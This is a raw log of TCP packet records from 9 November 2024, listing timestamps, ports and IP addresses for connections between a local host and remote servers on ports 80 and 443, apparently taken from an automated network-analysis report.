Nov 9, 2024 02:47:11.814204931 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814204931 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814215899 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814224958 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814229965 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814237118 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814248085 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814258099 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814263105 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814270020 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814280033 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814290047 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814297915 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814301014 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814312935 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814316988 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814323902 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814335108 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814344883 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814347029 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814364910 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814384937 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814388037 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814399958 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814409971 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814434052 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814464092 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814526081 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814568043 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814569950 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814579964 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814589977 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814615965 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814644098 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814651012 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814661980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814672947 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814685106 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814691067 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814713001 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814735889 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814747095 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814768076 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814770937 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814778090 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814788103 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814801931 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814821005 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814918995 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814930916 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814943075 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814955950 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814984083 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.815007925 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.815018892 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.815032959 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.815043926 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.815049887 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.815056086 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.815067053 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.815078020 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.815099955 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931328058 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931348085 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931360006 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931370974 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931389093 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931396961 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931400061 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931413889 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931431055 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931432962 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931442022 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931457996 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931458950 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931469917 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931474924 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931482077 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931485891 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931487083 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931493998 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931519985 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931539059 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931550026 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931571007 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931571960 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931571960 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931571960 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931582928 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931586981 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931602955 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931612968 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931622028 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931631088 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931642056 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931647062 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931654930 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931664944 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931667089 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931679010 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931689978 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931695938 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931703091 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931718111 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931720018 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931732893 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931736946 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931745052 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931759119 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931763887 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931770086 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931781054 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931791067 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931792974 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931802034 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931809902 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931816101 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931826115 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931835890 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931838989 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931854010 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931859016 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931866884 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931878090 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931885004 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931894064 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931896925 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931912899 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931915998 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931926966 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931938887 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931945086 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931957006 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931962967 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931972027 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.931974888 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.931987047 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.932004929 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.932027102 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.932039022 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.932080984 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:13.134217024 CET	49677	443	192.168.2.7	20.50.201.200
Nov 9, 2024 02:47:13.678848982 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:13.678878069 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:13.678937912 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:13.679455042 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:13.679467916 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.270994902 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.271023035 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.271111012 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.271532059 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.271545887 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.400288105 CET	49707	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.400316000 CET	443	49707	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.400403023 CET	49707	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.420708895 CET	49707	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.420721054 CET	443	49707	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.538719893 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.577413082 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.577435017 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.579389095 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.579462051 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.592525959 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.592660904 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.592931032 CET	49708	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.592950106 CET	443	49708	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.593055964 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.593065023 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.593086004 CET	49708	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.593539000 CET	49708	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.593549967 CET	443	49708	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.649321079 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.869049072 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.869115114 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.869168043 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.869174004 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.869194031 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.869230986 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.869247913 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.869256020 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.869304895 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.869316101 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.869322062 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.869369030 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.871494055 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.914944887 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.914963007 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.926413059 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:14.926486015 CET	443	49703	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:14.926539898 CET	49703	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.140305996 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.140634060 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.140644073 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.142060995 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.142139912 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.142491102 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.142597914 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.142635107 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.187330008 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.196367979 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.196384907 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.243247986 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.270612955 CET	443	49707	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.271008968 CET	49707	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.271032095 CET	443	49707	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.272111893 CET	443	49707	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.272169113 CET	49707	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.272849083 CET	49707	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.272911072 CET	443	49707	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.273037910 CET	49707	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.317291975 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:15.317325115 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:15.317580938 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:15.317886114 CET	49709	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:15.317898035 CET	443	49709	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:15.319333076 CET	443	49707	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.321332932 CET	49707	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.321343899 CET	443	49707	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.430697918 CET	49707	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.432451963 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.432511091 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.432548046 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.432590008 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.432604074 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.432615995 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.432642937 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.432657003 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.432749033 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.432755947 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.440905094 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.440965891 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.440973043 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.450481892 CET	443	49708	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.451428890 CET	49708	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.451442003 CET	443	49708	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.452624083 CET	443	49708	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.452688932 CET	49708	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.453042030 CET	49708	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.453203917 CET	443	49708	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.542534113 CET	443	49707	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.552340031 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.552402973 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.552432060 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.552556992 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.552571058 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.553056955 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.553158045 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.553165913 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.557487965 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.559120893 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.559128046 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.566329002 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.567130089 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.567137957 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.575179100 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.575253010 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.575261116 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.583928108 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.584104061 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.584111929 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.592938900 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.593034983 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.593043089 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.600815058 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.600910902 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.600919962 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.608764887 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.608840942 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.608848095 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.634001017 CET	49708	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.634002924 CET	49707	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.634007931 CET	443	49708	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.634011984 CET	443	49707	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.635504007 CET	49707	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.635595083 CET	443	49707	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.635667086 CET	49707	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.672424078 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.672463894 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.672507048 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.672677040 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.672677040 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.672689915 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.673068047 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.673135042 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.673141956 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.673783064 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.673815966 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.673850060 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.673856974 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.675116062 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.675122976 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.677536011 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.677578926 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.677612066 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.677639961 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.677648067 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.677675009 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.686407089 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.686584949 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.686593056 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.690550089 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.691119909 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.691128016 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.696496010 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.697299957 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.697307110 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.703836918 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.704503059 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.704510927 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.708545923 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.708636999 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.708642960 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.714644909 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.714703083 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.714709044 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.720730066 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.720803022 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.720812082 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.727158070 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.727211952 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.727220058 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.733047009 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.733150005 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.733156919 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.739250898 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.739943981 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.739950895 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.745397091 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.745871067 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.745879889 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.792593002 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.792642117 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.792651892 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.792659044 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.792700052 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.792716026 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.792787075 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.792825937 CET	443	49706	216.58.206.36	192.168.2.7
Nov 9, 2024 02:47:15.792829990 CET	49706	443	192.168.2.7	216.58.206.36
Nov 9, 2024 02:47:15.792840004 CET	443	49706	216.58.206.36	192.168.2.7
